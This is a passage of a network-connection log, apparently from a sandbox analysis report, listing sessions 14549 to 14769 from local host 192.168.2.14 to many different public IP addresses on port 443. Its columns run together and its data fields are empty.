                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14549192.168.2.1443784121.107.85.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14550192.168.2.1450774206.155.209.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14551192.168.2.1452108125.3.150.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14552192.168.2.143343873.158.206.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14553192.168.2.144452662.140.120.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14554192.168.2.144975075.211.205.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14555192.168.2.144514831.47.117.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14556192.168.2.143739091.54.129.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14557192.168.2.1441304170.148.107.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14558192.168.2.1441262128.240.138.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14559192.168.2.143673448.222.140.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14560192.168.2.1437078159.212.20.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14561192.168.2.14354505.26.72.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14562192.168.2.143332420.217.168.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14563192.168.2.1435194179.242.203.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14564192.168.2.1455704200.240.3.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14565192.168.2.1452204162.134.216.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14566192.168.2.144715837.247.221.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14567192.168.2.1443410169.72.173.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14568192.168.2.145002049.153.229.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14569192.168.2.144813890.214.189.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14570192.168.2.1458390139.206.6.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14571192.168.2.145340012.85.74.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14572192.168.2.145597090.34.87.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14573192.168.2.143362492.95.76.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14574192.168.2.1433496168.225.81.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14575192.168.2.1459972156.23.64.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14576192.168.2.1440060206.21.238.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14577192.168.2.1433470121.159.244.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14578192.168.2.1447324178.47.229.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14579192.168.2.145630634.22.74.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14580192.168.2.1436380164.110.163.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14581192.168.2.143817689.103.75.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14582192.168.2.1457410221.161.190.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14583192.168.2.1446306109.202.180.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14584192.168.2.1443654147.36.208.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14585192.168.2.1447250219.98.77.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14586192.168.2.144581068.248.250.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14587192.168.2.143288034.173.218.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14588192.168.2.1450396160.180.217.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14589192.168.2.144424838.231.92.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14590192.168.2.145240431.220.195.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14591192.168.2.1443170132.100.169.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14592192.168.2.1446022192.188.207.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14593192.168.2.143486870.152.106.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14594192.168.2.144090074.139.117.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14595192.168.2.144639464.202.143.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14596192.168.2.145577032.99.19.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14597192.168.2.1459838119.169.222.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14598192.168.2.145178487.228.100.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14599192.168.2.144251069.249.250.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14600192.168.2.143365239.128.34.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14601192.168.2.1445770112.55.94.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14602192.168.2.14490482.52.197.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14603192.168.2.145135247.130.146.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14604192.168.2.1451510116.122.143.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14605192.168.2.1432776206.1.48.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14606192.168.2.1442170199.251.99.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14607192.168.2.144161648.167.85.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14608192.168.2.1439732185.92.103.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14609192.168.2.1434936175.222.245.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14610192.168.2.1434794147.44.240.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14611192.168.2.145036495.84.216.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14612192.168.2.1452684178.3.124.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14613192.168.2.1438748153.38.223.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14614192.168.2.1436378168.187.133.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14615192.168.2.1456222136.38.215.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14616192.168.2.145105436.70.84.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14617192.168.2.144711232.154.62.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14618192.168.2.145822441.140.111.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14619192.168.2.1458848152.58.25.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14620192.168.2.14378862.184.4.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14621192.168.2.145620853.81.146.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14622192.168.2.1448064143.55.21.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14623192.168.2.1454892145.133.200.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14624192.168.2.1456840102.169.0.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14625192.168.2.1447498154.129.16.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14626192.168.2.1441896187.225.199.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14627192.168.2.145477641.59.138.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14628192.168.2.145843060.117.118.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14629192.168.2.1447528180.182.0.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14630192.168.2.143644867.202.254.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14631192.168.2.1447672134.21.78.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14632192.168.2.1456852211.180.127.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14633192.168.2.1450426205.137.193.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14634192.168.2.143292297.102.21.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14635192.168.2.1439500213.158.250.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14636192.168.2.144926636.145.144.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14637192.168.2.1442456170.68.85.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14638192.168.2.1452046105.108.207.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14639192.168.2.1442864220.101.13.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14640192.168.2.1448504217.114.24.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14641192.168.2.145309095.111.189.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14642192.168.2.1441846202.36.106.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14643192.168.2.144824858.23.2.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14644192.168.2.145788885.54.255.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14645192.168.2.1454516126.30.194.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14646192.168.2.1437496123.17.252.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14647192.168.2.14583622.245.229.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14648192.168.2.1442212100.244.49.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14649192.168.2.143669836.143.11.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14650192.168.2.144703447.173.60.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14651192.168.2.145555047.39.233.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14652192.168.2.1449672217.41.160.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14653192.168.2.145007419.138.31.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14654192.168.2.145051443.245.225.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14655192.168.2.1440048126.199.181.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14656192.168.2.145266060.26.227.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14657192.168.2.1456890213.120.149.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14658192.168.2.1456490223.37.1.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14659192.168.2.1435834221.155.246.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14660192.168.2.14331049.78.122.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14661192.168.2.145742092.250.71.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14662192.168.2.144091431.85.217.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14663192.168.2.145715438.153.87.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14664192.168.2.1446848152.156.253.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14665192.168.2.145286667.166.15.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14666192.168.2.1455244178.55.204.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14667192.168.2.1435716210.139.28.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14668192.168.2.143822868.162.161.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14669192.168.2.144857647.218.157.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14670192.168.2.1460516144.90.118.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14671192.168.2.145030034.132.117.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14672192.168.2.146051212.176.35.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14673192.168.2.143594269.194.55.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14674192.168.2.144134474.191.104.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14675192.168.2.1459108174.52.93.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14676192.168.2.1443258193.178.191.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14677192.168.2.143618641.87.213.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14678192.168.2.14533948.168.161.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14679192.168.2.145047638.112.13.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14680192.168.2.1453538143.31.165.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14681192.168.2.144080295.102.13.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14682192.168.2.1441502201.230.0.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14683192.168.2.1436674113.3.198.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14684192.168.2.143759050.208.214.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14685192.168.2.1438256187.7.137.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14686192.168.2.1433378189.22.55.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14687192.168.2.1449634157.152.28.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14688192.168.2.1439460163.171.29.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14689192.168.2.1436292220.184.153.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14690192.168.2.143790283.13.143.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14691192.168.2.1443482198.105.31.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14692192.168.2.1452110171.161.252.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14693192.168.2.1436820212.159.79.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14694192.168.2.1453150125.114.49.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14695192.168.2.1439114109.242.184.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14696192.168.2.143661473.229.220.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14697192.168.2.1459844218.46.214.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14698192.168.2.1457202182.22.213.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14699192.168.2.143287298.200.26.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14700192.168.2.1438836109.48.21.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14701192.168.2.1444678151.222.59.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14702192.168.2.1459648155.160.145.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14703192.168.2.1458782223.39.87.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14704192.168.2.1446994104.220.150.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14705192.168.2.1449202161.237.23.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14706192.168.2.1453366180.202.125.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14707192.168.2.145573661.162.200.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14708192.168.2.1451564219.9.113.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14709192.168.2.1433772134.3.245.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14710192.168.2.1451668184.38.131.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14711192.168.2.1438366180.233.13.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14712192.168.2.1454740155.203.77.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14713192.168.2.1459428112.49.129.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14714192.168.2.143357667.166.84.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14715192.168.2.1455192167.32.184.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14716192.168.2.1433338138.133.52.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14717192.168.2.145214644.147.141.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14718192.168.2.145175477.37.87.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14719192.168.2.1454268192.129.8.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14720192.168.2.1440702135.116.62.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14721192.168.2.1445796223.123.30.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14722192.168.2.1438762117.47.208.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14723192.168.2.1450476163.111.163.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14724192.168.2.1448736202.22.200.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14725192.168.2.144888485.170.242.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14726192.168.2.143429617.181.104.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14727192.168.2.1457378167.6.158.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14728192.168.2.1435204124.101.182.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14729192.168.2.1453552200.120.29.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14730192.168.2.1459974209.67.154.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14731192.168.2.143689846.74.151.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14732192.168.2.1460332167.192.105.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14733192.168.2.1451576124.190.67.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14734192.168.2.1438982192.50.91.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14735192.168.2.1455868168.47.253.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14736192.168.2.1458282202.149.114.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14737192.168.2.145196039.72.20.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14738192.168.2.144358043.102.236.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14739192.168.2.1442236178.57.76.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14740192.168.2.143923250.203.9.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14741192.168.2.1434222136.254.5.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14742192.168.2.144912444.124.196.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14743192.168.2.1454520138.44.59.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14744192.168.2.1457228114.197.231.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14745192.168.2.143278279.7.223.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14746192.168.2.1446576101.239.98.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14747192.168.2.1444158205.111.233.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14748192.168.2.1437974133.147.58.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14749192.168.2.1452498137.189.19.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14750192.168.2.1434382126.136.9.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14751192.168.2.145062496.128.101.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14752192.168.2.144679227.135.214.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14753192.168.2.144838023.192.55.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14754192.168.2.1442500110.6.239.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14755192.168.2.1441944136.83.192.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14756192.168.2.1442354149.82.1.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14757192.168.2.143394663.162.130.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14758192.168.2.1449298125.239.60.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14759192.168.2.1439110121.177.97.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14760192.168.2.1449908217.244.88.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14761192.168.2.1433230198.60.222.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14762192.168.2.1449114150.108.238.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14763192.168.2.144070677.187.145.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14764192.168.2.144922699.168.81.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14765192.168.2.1450910106.6.206.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14766192.168.2.1442562184.173.2.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14767192.168.2.1444902196.126.216.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14768192.168.2.143747451.46.141.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14769192.168.2.1439334104.222.76.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
